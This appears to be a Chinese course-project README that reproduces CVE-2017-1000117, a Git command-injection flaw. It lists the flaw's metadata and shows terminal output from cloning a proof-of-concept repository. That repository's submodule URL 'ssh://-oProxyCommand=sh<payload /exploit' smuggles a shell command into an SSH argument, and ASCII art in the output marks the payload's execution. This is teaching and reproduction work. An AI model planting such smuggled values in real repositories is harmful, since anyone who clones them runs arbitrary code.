- 网络安全课程设计选题之一
- CVE-2017-1000117 漏洞的复现(PoC+Exp)
- Git + SSH
- 漏洞名称: Git命令注入漏洞
- CNNVD编号:CNNVD-201708-670
- 危害等级:中危
- CVE编号:CVE-2017-1000117
- 漏洞类型:命令注入
- 发布时间:2017-08-16
- 威胁类型:远程
- 更新时间:2017-10-17
- 厂商:git-scm
- 漏洞来源:TrevorJay
- 漏洞简介:Git是美国软件开发者林纳斯-托瓦兹(LinusTorvalds)所研发的一套免费、开源的分布式版本控制系统。Git2.7.5之前的版 本中存在命令漏洞。远程攻击者可借助特制的‘ssh://...’URL利用该漏洞运行任意设备已退出的程序。
$ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
Cloning into 'CVE-2017-1000117'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
Unpacking objects: 100% (14/14), done.
Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
Pseudo-terminal will not be allocated because stdin is not a terminal.
*********************************************
_ooOoo_
o8888888o
88" . "88
(| -_- |)
O\ = /O
____/`---'\____
.' \\| |// `.
/ \\||| : |||// \
/ _||||| -:- |||||- \
| | \\\ - /// | |
| \_| ''\---/'' | |
\ .-\__ `-` ___/-. /
___`. .' /--.--\ `. . __
."" '< `.___\_<|>_/___.' >'"".
| | : `- \`.;`\ _ /`;.`/ - ` : | |
\ \ `-. \_ __\ /__ _/ .-` / /
======`-.____`-.___\_____/___.-`____.-'======
`=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ssh_exchange_identification: Connection closed by remote host
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
Failed to clone 'exploit'. Retry scheduled
- 当你看到佛祖出现的时候,漏洞已经被复现出来了,payload中的恶意代码已经被成功执行。